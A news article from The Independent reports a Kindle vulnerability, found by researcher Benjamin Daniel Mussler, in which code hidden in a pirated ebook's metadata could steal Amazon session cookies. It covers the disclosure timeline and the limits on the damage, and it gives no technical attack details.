Kindle security flaw 'could let hackers take over your Amazon account' with a malicious ebook

The corrupting influence of fiction is proved once again

Click to follow
The Independent Tech

Most internet users know that illegally downloading movies and music can be a quick way to get viruses on your computer, but now hackers can also exploit a relatively new type of digital contraband: pirated ebooks.

German security researcher Benjamin Daniel Mussler has discovered a vulnerability in Amazon’s Kindle e-reader that lets hackers hide malicious code in a book’s metadata that compromises their Amazon account.  

Mr Mussler first came across the issue in October last year and notified Amazon. The company patched the problem in four days but recently re-introduced it after updating their ‘Manage your Kindle’ application. Mr Mussler says that he notified the company once more but after hearing no reply for several months he decided to go public with the flaw.

“From the [hacker’s] point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts,” wrote Mr Mussler on his personal blog, adding that “Users who stick to e-books sold and delivered by Amazon should be safe.”

Thankfully, even for individuals who do fall under the influence of a malicious novel or volume of poetry, the actual damage the hacker can do is mitigated by Amazon’s own security measures.

The Kindle flaw gives hackers access to Amazon accounts by stealing their browsing credentials (the cookie saved by your computer that tells Amazon’s website that you’re you) but this means an interloper can only order packages to one of your saved destinations as adding a delivery address requires users to re-enter their credit card details – information that isn’t compromised by the attack.

This doesn’t mean that a hacker couldn’t cause quite a bit of trouble (ordering large amounts of items to max out someone’s credit card for example) but as hacks go it's not on the same scale as someone taking over your computer.

At the time of writing Amazon had not responded to requests for comment.

Update: Mr Mussler told The Independent over email that he believes Amazon has now fixed the flaw.